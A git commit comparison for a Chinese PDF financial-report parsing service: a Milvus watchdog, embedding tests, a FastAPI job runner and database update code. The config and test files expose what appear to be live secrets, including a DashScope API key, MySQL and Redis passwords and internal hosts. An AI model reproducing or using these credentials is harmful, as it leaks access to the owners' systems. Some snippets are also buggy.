Compare commits

...

2 Commits

Author SHA1 Message Date
yeshu edbcc245a6 feat: 导入全新的项目代码 2025-08-20 09:49:07 +08:00
yeshu 24764099c4 feat: 清理工作区,为导入新代码做准备 2025-08-20 09:46:46 +08:00
52 changed files with 145232 additions and 3076 deletions

58
monitor_milvus.py Normal file
View File

@ -0,0 +1,58 @@
import socket
import subprocess
import time
from datetime import datetime
def get_time():
return datetime.now().strftime('%Y-%m-%d %H:%M:%S')
def check_port(host, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
result = sock.connect_ex((host, port))
sock.close()
return result
except Exception as e:
print(f"[{get_time()}] 端口检测异常: {str(e)}")
return False
def restart_service():
try:
subprocess.run("bash /root/docker/milvus/standalone_embed.sh restart", shell=True)
# 正确示例
# subprocess.run(["bash", "standalone_embed.sh", "restart"])
print(f"[{get_time()}] milvus服务重启成功")
return True
except subprocess.CalledProcessError as e:
print(f"[{get_time()}] 服务重启失败: {str(e)}")
return False
def restart_zzbservice():
try:
subprocess.run("cd /root/pdf_parser/zzb_data_prod", shell=True)
subprocess.run("nohup python3 app.py > app.log 2>&1 &", shell=True)
print("zzb服务重启成功")
return True
except subprocess.CalledProcessError as e:
print(f"[{get_time()}] zzb服务重启失败: {str(e)}")
if __name__ == '__main__':
print(f"[{get_time()}] 启动Milvus监控服务")
port_ok = check_port("127.0.0.1", 19530)
if port_ok not in [0,True]:
print("检测到Milvus服务异常尝试重启...")
restart_service()
print(f"[{get_time()}] 启动zzb监控服务")
port_ok = check_port("127.0.0.1", 8000)
if port_ok not in [0,True]:
print("检测到zzb服务异常尝试重启...")
restart_zzbservice()

BIN
zzb_data_prod/.DS_Store vendored Normal file

Binary file not shown.

View File

@ -0,0 +1,99 @@
# Requires transformers>=4.51.0
import torch
import torch.nn.functional as F
from torch import Tensor
from modelscope import AutoTokenizer, AutoModel
import datetime
import dashscope
from http import HTTPStatus
dashscope.api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
def embed_with_str(input):
retry = 0
max_retry = 5
t = 0.2
while retry < max_retry:
# time.sleep(t)
#阿里接口限流
resp = dashscope.TextEmbedding.call(
model=dashscope.TextEmbedding.Models.text_embedding_v2,
input=input)
if resp.status_code == HTTPStatus.OK:
return resp
elif resp.status_code == 429:
logger.info(f'触发限流,等待{t}秒后重试')
retry += 1
t+=0.1
else:
logger.error(f'请求失败,状态码:{resp.status_code}')
return None
logger.error('重试超过上限')
return None
def last_token_pool(last_hidden_states: Tensor,
attention_mask: Tensor) -> Tensor:
left_padding = (attention_mask[:, -1].sum() == attention_mask.shape[0])
if left_padding:
return last_hidden_states[:, -1]
else:
sequence_lengths = attention_mask.sum(dim=1) - 1
batch_size = last_hidden_states.shape[0]
return last_hidden_states[torch.arange(batch_size, device=last_hidden_states.device), sequence_lengths]
def get_detailed_instruct(task_description: str, query: str) -> str:
return f'Instruct: {task_description}\nQuery:{query}'
# Each query must come with a one-sentence instruction that describes the task
task = 'Given a web search query, retrieve relevant passages that answer the query'
queries = [
get_detailed_instruct(task, 'What is the capital of China?'),
get_detailed_instruct(task, 'Explain gravity')
]
# No need to add instruction for retrieval documents
documents = [
"The capital of China is Beijing.",
"Gravity is a force that attracts two bodies towards each other. It gives weight to physical objects and is responsible for the movement of planets around the sun."
]
input_texts = queries + documents
tokenizer = AutoTokenizer.from_pretrained('Qwen/Qwen3-Embedding-0.6B', padding_side='left')
model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B')
# We recommend enabling flash_attention_2 for better acceleration and memory saving.
# model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B', attn_implementation="flash_attention_2", torch_dtype=torch.float16).cuda()
print(datetime.datetime.now())
max_length = 8192
# Tokenize the input texts
batch_dict = tokenizer(
input_texts,
padding=True,
truncation=True,
max_length=max_length,
return_tensors="pt",
)
batch_dict.to(model.device)
outputs = model(**batch_dict)
embeddings = last_token_pool(outputs.last_hidden_state, batch_dict['attention_mask'])
# normalize embeddings
embeddings = F.normalize(embeddings, p=2, dim=1)
print(f"=========embeddings=========")
print(datetime.datetime.now())
scores = (embeddings[:2] @ embeddings[2:].T)
print(len(embeddings.tolist()[0]))
# [[0.7645568251609802, 0.14142508804798126], [0.13549736142158508, 0.5999549627304077]]
vector_obj = embed_with_str(input_texts)
vector = vector_obj.output["embeddings"][0]["embedding"]
print(len(vector))

View File

@ -1,9 +1,11 @@
from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
from config import MILVUS_CLIENT from config import MILVUS_CLIENT
import time
from datetime import datetime, timedelta
def create_partition_by_hour(current_hour): def create_partition_by_hour(current_hour):
# 连接到 Milvus 服务器 # 连接到 Milvus 服务器
connections.connect("default",uri=MILVUS_CLIENT) connections.connect(uri=MILVUS_CLIENT)
# 获取集合 # 获取集合
collection_name = "pdf_measure_v4" collection_name = "pdf_measure_v4"
collection = Collection(collection_name) collection = Collection(collection_name)
@ -32,37 +34,6 @@ def create_partition_by_hour(current_hour):
# data = []
# measure_data = {}
# vector = [0.61865162262130161] * 1536
# measure_data['vector'] = vector
# measure_data['table_num'] = int(2)
# measure_data['table_index'] = int(2)
# measure_data['measure_name'] = "234234"
# measure_data['measure_value'] = "23432"
# measure_data['measure_unit'] = "123423"
# measure_data['file_id'] = "100000"
#
# data.append(measure_data)
# res = client.insert(
# collection_name=collection_name,
# data=data,
# partition_name=partition_name
# )
# filter_str = 'file_id == "'+"2122"+'"'
# res = client.search(
# collection_name=collection_name, # Replace with the actual name of your collection
# # Replace with your query vector
# data=data,
# limit=3, # Max. number of search results to return
# search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
# output_fields=["measure_name", "measure_value", "table_num", "table_index", "measure_unit"],
# filter=filter_str,
# partition_name=partition_name
# )
# print(f"============================={res}")

View File

@ -14,10 +14,10 @@ import db_service
import threading import threading
from Mil_unit import create_partition_by_hour from Mil_unit import create_partition_by_hour
from datetime import datetime, timedelta from datetime import datetime, timedelta
from log_config import logger
app = FastAPI() app = FastAPI()
cpu_count = os.cpu_count() cpu_count = 4
job_queue = queue.Queue() job_queue = queue.Queue()
# 定义请求体模型 # 定义请求体模型
@ -30,7 +30,7 @@ def run_job():
if_run = True if_run = True
if job_queue.empty(): if job_queue.empty():
print(f"job_queue为空: {file_path}") logger.info(f"job_queue为空: {file_path}")
if_run = False if_run = False
if if_run: if if_run:
@ -43,29 +43,19 @@ def run_job():
try: try:
#下载pdf #下载pdf
start_time = time.time() start_time = time.time()
print(f"开始启动文件解析任务: {file_path}") logger.info(f"开始启动文件解析任务: {file_path}")
if file_path.startswith('http'): if file_path.startswith('http'):
file_path = utils.save_pdf_from_url(file_path, config.FILE_PATH) file_path = utils.save_pdf_from_url(file_path, config.FILE_PATH)
try: try:
file_info = pdf_title.create_text_outline(file_path,file_id) file_info = pdf_title.create_text_outline(file_path,file_id)
except Exception as e: except Exception as e:
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 7}) response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 7})
print(f'通知任务状态url:{file_id}:{response.url}') logger.info(f'通知任务状态url:{file_id}:{response.url}')
print(f'通知任务状态任务:{file_id}:{response.text}') logger.info(f'通知任务状态任务:{file_id}:{response.text}')
print(f"{file_id}运行失败: {e}") logger.info(f"{file_id}运行失败: {e}")
continue_execution = False continue_execution = False
if continue_execution: if continue_execution:
print(cpu_count)
parent_table_pages = file_info['parent_table_pages'] parent_table_pages = file_info['parent_table_pages']
print('parent_table_pages的值是')
print(parent_table_pages)
# page_nums = [
# '1-3',
# '4-6',
# ]
print(cpu_count)
print('测试')
page_num = file_info['page_count'] page_num = file_info['page_count']
if page_num < cpu_count: if page_num < cpu_count:
p_count = page_num p_count = page_num
@ -73,7 +63,6 @@ def run_job():
p_count = cpu_count p_count = cpu_count
for i in range(p_count): for i in range(p_count):
# for i in range(2):
page_list.append({ page_list.append({
'type': 'table', 'type': 'table',
'page_num': file_info['split_parts']['table_split_parts'][i], 'page_num': file_info['split_parts']['table_split_parts'][i],
@ -88,8 +77,8 @@ def run_job():
# 通知开始解析 # 通知开始解析
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 5}) response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 5})
print(f'通知pdf开始解析url:{file_id}:{response.url}') logger.info(f'通知pdf开始解析url:{file_id}:{response.url}')
print(f'通知pdf开始解析状态:{file_id}:{response.text}') logger.info(f'通知pdf开始解析状态:{file_id}:{response.text}')
parser_start_time = time.time() parser_start_time = time.time()
processes = [] processes = []
time_dispatch_job = time.time() time_dispatch_job = time.time()
@ -98,30 +87,27 @@ def run_job():
p = Process(target=main.dispatch_job, args=(job_info,)) p = Process(target=main.dispatch_job, args=(job_info,))
processes.append(p) processes.append(p)
p.start() p.start()
#time_dispatch_job_end = time.time()
#process_time = time_dispatch_job_end - time_dispatch_job
#db_service.process_time(file_id,'1',process_time)
print('等待所有子任务完成任务ID:', file_id) logger.info(f'等待所有子任务完成任务ID:{file_id}')
for p in processes: for p in processes:
p.join() p.join()
print('pdf解析任务完成任务完成任务ID:', file_id) logger.info(f'pdf解析任务完成任务完成任务ID:{file_id}')
time_dispatch_job_end = time.time() time_dispatch_job_end = time.time()
process_time = time_dispatch_job_end - time_dispatch_job process_time = time_dispatch_job_end - time_dispatch_job
db_service.process_time(file_id,'1',process_time,time_dispatch_job,time_dispatch_job_end) db_service.process_time(file_id,'1',process_time,time_dispatch_job,time_dispatch_job_end)
parser_end_time = time.time() parser_end_time = time.time()
print(f"解析任务 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。") logger.info(f"解析任务 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
#这里做一步判断,看看是否还要继续。 #这里做一步判断,看看是否还要继续。
if db_service.file_type_check(file_id): if db_service.file_type_check(file_id):
print("文本较真表格生成已结束") logger.info(f"文本较真表格生成已结束")
else: else:
# 通知抽取指标 # 通知抽取指标
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 6}) response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 6})
print(f'通知开始抽取指标url:{file_id}:{response.url}') logger.info(f'通知开始抽取指标url:{file_id}:{response.url}')
print(f'通知开始抽取指标状态:{file_id}:{response.text}') logger.info(f'通知开始抽取指标状态:{file_id}:{response.text}')
parser_start_time = time.time() parser_start_time = time.time()
print('开始表格指标抽取任务ID:', file_id) logger.info(f'开始表格指标抽取任务ID:{file_id}')
time_start = time.time() time_start = time.time()
@ -131,6 +117,7 @@ def run_job():
partition_name = f"partition_{current_hour}" partition_name = f"partition_{current_hour}"
# 判断是否创建新的分区 # 判断是否创建新的分区
create_partition_by_hour(current_hour) create_partition_by_hour(current_hour)
time.sleep(10)
# 判断是否为3季报 # 判断是否为3季报
if db_service.file_type_check_v2(file_id) == 3: if db_service.file_type_check_v2(file_id) == 3:
@ -138,17 +125,17 @@ def run_job():
time_start_end = time.time() time_start_end = time.time()
process_time = time_start_end - time_start process_time = time_start_end - time_start
db_service.process_time(file_id,'2',process_time,time_start,time_start_end) db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
print('表格指标抽取完成任务ID:', file_id) logger.info(f'表格指标抽取完成任务ID:{file_id}')
parser_end_time = time.time() parser_end_time = time.time()
print(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。") logger.info(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
print('启动这个指标归一化任务ID-修改测试:', file_id) logger.info(f'启动这个指标归一化任务ID-修改测试:{file_id}')
time_update = time.time() time_update = time.time()
main.update_measure_data(file_id,file_path,parent_table_pages,partition_name) main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
print('归一化完成任务ID:', file_id) logger.info(f'归一化完成任务ID:{file_id}')
end_time = time.time() end_time = time.time()
print(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。") logger.info(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。")
time_update_end = time.time() time_update_end = time.time()
process_time = time_update_end - time_update process_time = time_update_end - time_update
db_service.process_time(file_id,'3',process_time,time_update,time_update_end) db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
@ -158,25 +145,25 @@ def run_job():
time_start_end = time.time() time_start_end = time.time()
process_time = time_start_end - time_start process_time = time_start_end - time_start
db_service.process_time(file_id,'2',process_time,time_start,time_start_end) db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
print('表格指标抽取完成任务ID:', file_id) logger.info(f'表格指标抽取完成任务ID:{file_id}')
parser_end_time = time.time() parser_end_time = time.time()
print(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。") logger.info(f"表格指标抽取 {file_id} 完成,耗时{(parser_end_time - parser_start_time):.2f} 秒。")
print('启动这个指标归一化任务ID-修改测试:', file_id) logger.info(f'启动这个指标归一化任务ID-修改测试:{file_id}')
time_update = time.time() time_update = time.time()
main.update_measure_data(file_id,file_path,parent_table_pages,partition_name) main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)
print('归一化完成任务ID:', file_id) logger.info(f'归一化完成任务ID:{file_id}')
end_time = time.time() end_time = time.time()
print(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。") logger.info(f"任务 {file_id} 完成,耗时{(end_time - start_time):.2f} 秒。")
time_update_end = time.time() time_update_end = time.time()
process_time = time_update_end - time_update process_time = time_update_end - time_update
db_service.process_time(file_id,'3',process_time,time_update,time_update_end) db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
#通知任务完成 #通知任务完成
response_time = time.time() response_time = time.time()
response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 1}) response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 1})
print(f'通知任务状态url:{file_id}:{response.url}') logger.info(f'通知任务状态url:{file_id}:{response.url}')
print(f'通知任务状态任务:{file_id}:{response.text}') logger.info(f'通知任务状态任务:{file_id}:{response.text}')
response_time_end = time.time() response_time_end = time.time()
process_time = response_time_end - response_time process_time = response_time_end - response_time
db_service.process_time(file_id,'4',process_time,response_time,response_time_end) db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
@ -191,17 +178,17 @@ def run_job():
response_time_end = time.time() response_time_end = time.time()
process_time = response_time_end - response_time process_time = response_time_end - response_time
db_service.process_time(file_id,'4',process_time,response_time,response_time_end) db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
print(f'通知任务状态url:{file_id}:{response.url}') logger.info(f'通知任务状态url:{file_id}:{response.url}')
print(f'通知任务状态任务:{file_id}:{response.text}') logger.info(f'通知任务状态任务:{file_id}:{response.text}')
print(f"Response status code: {response.status_code}") logger.info(f"Response status code: {response.status_code}")
print(f"{file_id}运行失败: {e}") logger.info(f"{file_id}运行失败: {e}")
finally: finally:
print(f"任务 {file_id} 完成,运行状态:{job_status}") logger.info(f"任务 {file_id} 完成,运行状态:{job_status}")
#pdf_company_0824.name_code_fix(file_id,file_path) #pdf_company_0824.name_code_fix(file_id,file_path)
#print('公司名与编码填充完毕') #print('公司名与编码填充完毕')
else: else:
print("有任务运行中,需要等待.....") logger.info(f"有任务运行中,需要等待.....")
def parse_pdf_route(fileItem: FileItem): def parse_pdf_route(fileItem: FileItem):
@ -210,7 +197,7 @@ def parse_pdf_route(fileItem: FileItem):
'file_path' : fileItem.file_path, 'file_path' : fileItem.file_path,
'file_id' : fileItem.file_id 'file_id' : fileItem.file_id
}) })
print(f"增加 {fileItem.file_id} 到队列.") logger.info(f"增加 {fileItem.file_id} 到队列.")
threading.Thread(target=run_job, args=()).start() threading.Thread(target=run_job, args=()).start()
@ -221,16 +208,37 @@ app.post("/parser/start",
summary="解析Pdf文件", summary="解析Pdf文件",
)(parse_pdf_route) )(parse_pdf_route)
def get_local_ip():
try:
# 创建一个 UDP 套接字
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# 连接到一个外部地址(这里使用 Google 的公共 DNS 服务器)
s.connect(("8.8.8.8", 80))
# 获取本地套接字的 IP 地址
local_ip = s.getsockname()[0]
except Exception as e:
logger.info(f"获取内网 IP 失败: {e}")
local_ip = "127.0.0.1" # 如果失败,返回本地回环地址
finally:
s.close() # 关闭套接字
return local_ip
# 运行 FastAPI 应用 # 运行 FastAPI 应用
if __name__ == "__main__": if __name__ == "__main__":
# 服务器启动服务 # 服务器启动服务
# import uvicorn import uvicorn
# uvicorn.run(app, host="0.0.0.0", port=config.PORT) uvicorn.run(app, host="0.0.0.0", port=config.PORT)
try:
# 获取内网IP
ip = get_local_ip()
response = requests.get(f"/api/tenant/report/restart?address={ip}:{config.PORT}")
except KeyboardInterrupt:
logger.info("Shutdown server")
# 本地调试任务 # 本地调试任务
job_queue.put({ # job_queue.put({
'file_path' : '3.pdf', # 'file_path' : '1.pdf',
'file_id' : '2122' # 'file_id' : '2122'
}) # })
#
run_job() # run_job()

Binary file not shown.

View File

@ -1,28 +1,28 @@
MILVUS_CLIENT='http://124.70.129.232:19530' MILVUS_CLIENT='http://127.0.0.1:19530'
#MILVUS_CLIENT='http://60.204.228.154:19530' MILVUS_HOST = '127.0.0.1'
MYSQL_HOST = '121.37.185.246' MILVUS_PORT = 19530
MYSQL_HOST = '10.127.2.207'
MYSQL_PORT = 3306 MYSQL_PORT = 3306
MYSQL_USER = 'financial' MYSQL_USER = 'financial_prod'
MYSQL_PASSWORD = 'financial_8000' MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
MYSQL_DB = 'financial_report' MYSQL_DB = 'financial_report_test'
NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify' NOTIFY_ADDR = 'http://10.127.2.206:8101/api/tenant/report/notify'
NOTIFY_ADDR_DIS = 'http://127.0.0.1:8100/api/tenant/info/notify' FILE_PATH = '/root/pdf_parser/pdf/'
REDIS_HOST = '123.60.153.169' REDIS_HOST = '10.127.2.206'
REDIS_PORT = 6379 REDIS_PORT = 6379
REDIS_PASSWORD = 'Xgf_redis' REDIS_PASSWORD = 'Xgf_redis'
FILE_PATH = '/root/pdf_parser/pdf/'
PORT = 8000 PORT = 8000
MEASURE_COUNT = 8 MEASURE_COUNT = 4
MYSQL_HOST_APP = '121.37.185.246' MYSQL_HOST_APP = '10.127.2.207'
MYSQL_PORT_APP = 3306 MYSQL_PORT_APP = 3306
MYSQL_USER_APP = 'financial' MYSQL_USER_APP = 'financial_prod'
MYSQL_PASSWORD_APP = 'financial_8000' MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
MYSQL_DB_APP = 'financial_report' MYSQL_DB_APP = 'financial_report_test'
api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
# 'sk-3cc9e1601f654c149d2a4e99ef8a8946'
#MYSQL_HOST_APP = '192.168.0.201'
#MYSQL_PORT_APP = 3306
#MYSQL_USER_APP = 'root'
#MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
#MYSQL_DB_APP = 'financial_report_prod'

View File

@ -10,6 +10,9 @@ from pymilvus import MilvusClient
import mysql.connector import mysql.connector
import threading import threading
import redis import redis
from log_config import logger
measure_name_keywords = ["营业","季度","利润","归属于","扣非","经营","现金","活动","损益","收益","资产","费用","销售","管理","财务","研发","货币资金","应收账款","存货","固定资产","在建工程","商誉","短期借款","应付账款","合同负债","长期借款","营业成本"] measure_name_keywords = ["营业","季度","利润","归属于","扣非","经营","现金","活动","损益","收益","资产","费用","销售","管理","财务","研发","货币资金","应收账款","存货","固定资产","在建工程","商誉","短期借款","应付账款","合同负债","长期借款","营业成本"]
# 解析大模型抽取的指标,并插入到数据库 # 解析大模型抽取的指标,并插入到数据库
@ -133,9 +136,9 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
WHERE file_id = %s AND page_num = %s AND table_index = %s WHERE file_id = %s AND page_num = %s AND table_index = %s
''' '''
cursor.execute(update_query, (unit, file_id, page_num, table_index)) cursor.execute(update_query, (unit, file_id, page_num, table_index))
#print(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.') logger.info(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
else: else:
print(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.') logger.info(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
else: else:
# 插入新的记录 # 插入新的记录
insert_query = ''' insert_query = '''
@ -145,7 +148,7 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
''' '''
data_to_insert = (file_id, page_num, table_index, unit) data_to_insert = (file_id, page_num, table_index, unit)
cursor.execute(insert_query, data_to_insert) cursor.execute(insert_query, data_to_insert)
#print(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.') logger.info(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
conn.commit() conn.commit()
@ -190,6 +193,16 @@ def update_ori_measure(conn,cursor,file_id):
and t1.file_id = '{file_id}' and t1.file_id = '{file_id}'
and t2.year = '{year}' and t2.year = '{year}'
'''.format(file_id=file_id, year=report_year) '''.format(file_id=file_id, year=report_year)
select_query_first = '''
SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
FROM ori_measure_list t1
left join
measure_config_first_quarter t2
on t1.ori_measure_id = t2.ori_measure_id
where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
and t1.file_id = '{file_id}'
and t2.year = '{year}'
'''.format(file_id=file_id, year=report_year)
select_query_half_year = ''' select_query_half_year = '''
SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
FROM ori_measure_list t1 FROM ori_measure_list t1
@ -211,53 +224,67 @@ def update_ori_measure(conn,cursor,file_id):
and t2.year = '{year}' and t2.year = '{year}'
'''.format(file_id=file_id, year=report_year) '''.format(file_id=file_id, year=report_year)
if report_type == 1: if report_type == 1:#半年报
start_time = time.time() start_time = time.time()
cursor.execute(select_query_half_year) cursor.execute(select_query_half_year)
records = cursor.fetchall() records = cursor.fetchall()
end_time = time.time() end_time = time.time()
print(f"更新数据查询 {(end_time - start_time):.2f} 秒。") logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
print(f'update_ori_measure方法走的是半年报') logger.info(f'update_ori_measure方法走的是半年报')
elif report_type == 3: elif report_type == 2: # 一季报
start_time = time.time()
cursor.execute(select_query_first)
records = cursor.fetchall()
end_time = time.time()
logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
logger.info(f'update_ori_measure方法走的是一季报')
elif report_type == 3: # 三季报
start_time = time.time() start_time = time.time()
cursor.execute(select_query_thrid) cursor.execute(select_query_thrid)
records = cursor.fetchall() records = cursor.fetchall()
end_time = time.time() end_time = time.time()
print(f"更新数据查询 {(end_time - start_time):.2f} 秒。") logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
print(f'update_ori_measure方法走的是三季报') logger.info(f'update_ori_measure方法走的是三季报')
else: else:# 年报
start_time = time.time() start_time = time.time()
cursor.execute(select_query) cursor.execute(select_query)
records = cursor.fetchall() records = cursor.fetchall()
end_time = time.time() end_time = time.time()
print(f"更新数据查询 {(end_time - start_time):.2f} 秒。") logger.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
print(f'update_ori_measure方法走的是全年报') logger.info(f'update_ori_measure方法走的是全年报')
start_time = time.time() start_time = time.time()
for record in records: for record in records:
data_to_update = (record[0], record[1], record[2], file_id) data_to_update = (record[0], record[1], record[2], file_id)
cursor.execute(update_query, data_to_update) cursor.execute(update_query, data_to_update)
conn.commit() conn.commit()
end_time = time.time() end_time = time.time()
print(f"更新数据更新 {(end_time - start_time):.2f} 秒。") logger.info(f"更新数据更新 {(end_time - start_time):.2f} 秒。")
#更新measure_list表增加此次文件的显示指标 #更新measure_list表增加此次文件的显示指标
start_time = time.time() start_time = time.time()
create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S") create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if report_type == 0: if report_type == 0:#全年报
insert_query = ''' insert_query = '''
INSERT INTO measure_list INSERT INTO measure_list
(measure_id, measure_name, create_time, update_time, file_id) (measure_id, measure_name, create_time, update_time, file_id)
select distinct measure_id,measure_name, %s,%s,%s from measure_config select distinct measure_id,measure_name, %s,%s,%s from measure_config
where year = '{year}' where year = '{year}'
'''.format(year=report_year) '''.format(year=report_year)
elif report_type == 3: elif report_type == 2:# 一季报
insert_query = '''
INSERT INTO measure_list
(measure_id, measure_name, create_time, update_time, file_id)
select distinct measure_id,measure_name, %s,%s,%s from measure_config_first_quarter
where year = '{year}'
'''.format(year=report_year)
elif report_type == 3:# 三季报
insert_query = ''' insert_query = '''
INSERT INTO measure_list INSERT INTO measure_list
(measure_id, measure_name, create_time, update_time, file_id) (measure_id, measure_name, create_time, update_time, file_id)
select distinct measure_id,measure_name, %s,%s,%s from measure_config_third_quarter select distinct measure_id,measure_name, %s,%s,%s from measure_config_third_quarter
where year = '{year}' where year = '{year}'
'''.format(year=report_year) '''.format(year=report_year)
else: else:# 半年报
insert_query = ''' insert_query = '''
INSERT INTO measure_list INSERT INTO measure_list
(measure_id, measure_name, create_time, update_time, file_id) (measure_id, measure_name, create_time, update_time, file_id)
@ -269,13 +296,13 @@ def update_ori_measure(conn,cursor,file_id):
cursor.execute(insert_query, data_to_update) cursor.execute(insert_query, data_to_update)
conn.commit() conn.commit()
end_time = time.time() end_time = time.time()
print(f"更新数据写入 {(end_time - start_time):.2f} 秒。") logger.info(f"更新数据写入 {(end_time - start_time):.2f} 秒。")
def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name,): def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name,):
create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S") create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print('Run task %s (%s)...' % (record_range, os.getpid())) logger.info(f'Run task {record_range} ({os.getpid()})...')
print(f"插入数据 {len(records)}") logger.info(f"插入数据 {len(records)}")
conn = mysql.connector.connect( conn = mysql.connector.connect(
@ -332,11 +359,12 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
cursor_app.execute(select_parent_query) cursor_app.execute(select_parent_query)
parent_records = cursor_app.fetchall() parent_records = cursor_app.fetchall()
#print(f"before: {parent_table_pages}")
for parent_record in parent_records: for parent_record in parent_records:
parent_id = parent_record[0] parent_id = parent_record[0]
parent_table_pages.append(int(parent_id)) parent_table_pages.append(int(parent_id))
#print(f"after: {parent_table_pages}")
#表格上方文字黑名单关键词的页码和表格下标转成数组 #表格上方文字黑名单关键词的页码和表格下标转成数组
table_index_array = [] table_index_array = []
@ -348,15 +376,19 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
measure_index_array = [] measure_index_array = []
cursor_app.execute(select_measure_index_query, (file_id,)) cursor_app.execute(select_measure_index_query, (file_id,))
measure_index_records = cursor_app.fetchall() measure_index_records = cursor_app.fetchall()
print("Executing SQL:", select_measure_index_query) logger.info(f"Executing SQL:{select_measure_index_query}")
print("With file_id:", file_id) logger.info(f"With file_id:{file_id}")
for measure_index_record in measure_index_records: for measure_index_record in measure_index_records:
measure_index_array.append(measure_index_record[0]) measure_index_array.append(measure_index_record[0])
print(f'黑名单的值是{parent_table_pages}{table_index_array}以及新增的{measure_index_array}') logger.info(f'黑名单的值是{parent_table_pages}{table_index_array}以及新增的{measure_index_array}')
#print(f'黑名单的值是{parent_table_pages}和{table_index_array}') #print(f'黑名单的值是{parent_table_pages}和{table_index_array}')
record_start = record_range.split('-')[0] record_start = record_range.split('-')[0]
record_end = record_range.split('-')[1] record_end = record_range.split('-')[1]
if str(report_type) == "2":
table_index_array = []
measure_index_array = []
client = MilvusClient( client = MilvusClient(
uri=MILVUS_CLIENT, uri=MILVUS_CLIENT,
) )
@ -370,6 +402,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
ori_measure_id = record[3] ori_measure_id = record[3]
measure_id = record[4] measure_id = record[4]
measure_vector = redis_service.read_from_redis(redis_client,ori_measure_id) measure_vector = redis_service.read_from_redis(redis_client,ori_measure_id)
measure_list = ast.literal_eval(measure_vector) measure_list = ast.literal_eval(measure_vector)
data = [measure_list] data = [measure_list]
filter_str = 'file_id == "'+file_id+'"' filter_str = 'file_id == "'+file_id+'"'
@ -384,9 +418,9 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
partition_name=partition_name partition_name=partition_name
) )
# Convert the output to a formatted JSON string # Convert the output to a formatted JSON string
# for i in range(len(res[0])): # for i in range(len(res[0])):
for i in range(len(res[0])): for i in range(len(res[0])):
vector_distance = float(res[0][i]["distance"]) vector_distance = float(res[0][i]["distance"])
@ -411,17 +445,18 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
if utils.check_pdf_measure_black_list(pdf_measure): if utils.check_pdf_measure_black_list(pdf_measure):
continue continue
if f"{table_num}_{table_index}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app): if f"{table_num}_{table_index}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
#if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app): logger.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
